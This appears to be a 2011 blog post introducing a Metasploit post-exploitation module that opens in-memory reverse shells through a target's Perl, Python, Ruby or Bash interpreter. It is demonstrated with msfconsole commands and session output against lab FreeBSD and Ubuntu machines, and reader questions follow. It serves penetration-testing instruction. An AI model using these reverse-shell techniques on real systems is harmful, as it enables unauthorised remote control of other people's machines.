Secondary Shell Using Scripting Environment on Target
Friday, December 16, 2011 at 4:25PM After writing the payload inject module for Windows I was looking thru my Twitter feed and saw a tweet from Chris John Riley on the PentestMonkey website where he has a cheat sheet that shows how to use a targets scripting environment to create a reverse shell in one line executing with the code as an argument so that nothing is actually written to disk and the session resides in memory. After seeing this I thought it would be a great idea to have a s a module for Unix type systems (Linux, BSD,HPUX, Solaris, OS X..etc) So I wrote a module that is part of the framework that is called system_session. The module will look for the following scripting environments to us to create a reverse shell:
- Perl
- Python
- Ruby
- Bash
It will look in this same order for the presence of the interpreter and use it for creating the reverse shell.
For showing how the module works we will use some sessions to systems in my lab where session 1 is for a FreeBSD 8.2 VM, session 3 and session 4 is for a Linux Ubuntu System.
sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell bsd SSH admin:Newsystem01 (192.168.1.134:22) 192.168.1.241:55187 -> 192.168.1.134:22
2 meterpreter x86/win32 VICTIMLAB\administrator @ WIN701 192.168.1.100:4444 -> 192.168.1.138:23021
3 meterpreter x86/win32 VICTIMLAB\Administrator @ WIN2K3LAB01 192.168.1.100:4444 -> 192.168.1.138:4340
4 shell linux 192.168.1.100:4448 -> 192.168.1.135:37211
Lets start by selecting the module and looking at the options
msf auxiliary(ssh_login) > use post/multi/manage/system_session
msf post(system_session) > show options
Module options (post/multi/manage/system_session):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an Exploit Multi Handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)
Lets start with the case of letting the module select the first supported scripting environment and set a remote session
msf post(system_session) > set SESSION 1
SESSION => 1
msf post(system_session) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > run
[*] Starting exploit multi handler
[*] Started reverse handler on 192.168.1.100:4433
[*] Starting the payload handler...
[*] Python was found on target
[*] Python reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf post(system_session) > [*] Command shell session 5 opened (192.168.1.100:4433 -> 192.168.1.134:60732) at 2011-10-28 15:03:39 -0400
msf post(system_session) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell bsd SSH admin:Newsystem01 (192.168.1.134:22) 192.168.1.241:55187 -> 192.168.1.134:22
2 meterpreter x86/win32 VICTIMLAB\administrator @ WIN701 192.168.1.100:4444 -> 192.168.1.138:23021
3 meterpreter x86/win32 VICTIMLAB\Administrator @ WIN2K3LAB01 192.168.1.100:4444 -> 192.168.1.138:4340
4 shell linux 192.168.1.100:4448 -> 192.168.1.135:37211
5 shell bsd 192.168.1.100:4433 -> 192.168.1.134:60732
msf post(system_session) >
Now lets try just using the Bash reverse TCP shell using /dev/tcp on one of the Linux systems:
msf post(system_session) > set SESSION 4
SESSION => 4
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > run
[*] Starting exploit multi handler
[-] Job 5 is listening on IP 192.168.1.100 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Bash reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf post(system_session) > [*] Command shell session 6 opened (192.168.1.100:4433 -> 192.168.1.135:45662) at 2011-10-28 15:08:13 -0400
msf post(system_session) > sessions -i 6
[*] Starting interaction with 6...
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
carlos@infidel02-dev:/home/carlos/Desktop$ uname -a
uname -a
Linux infidel02-dev 2.6.32-25-generic #45-Ubuntu SMP Sat Oct 16 19:48:22 UTC 2010 i686 GNU/Linux
carlos@infidel02-dev:/home/carlos/Desktop$ ^Z
Background session 6? [y/N] y
As we can see this can become quite useful when the shell we have is one on a Unix type system where the framework still does not support injecting in to processes payloads and where writing a file to disk is not necessarily the best option in that case.
As alway I hope you find this information useful.
Reader Comments (3)
I only have two questions:
1- What if the target is a Windows system but has "python" installed. It must succeed too right?
2- What if the Linux target doesn't have perl/python/ruby and its shell (bash) doesn't support /dev/tcp? Then we can't benefit from it, right?
My Q(s) doesn't take anything away from your the new feature to Metasploit, but its just questions running in mind.
Thanks Dark,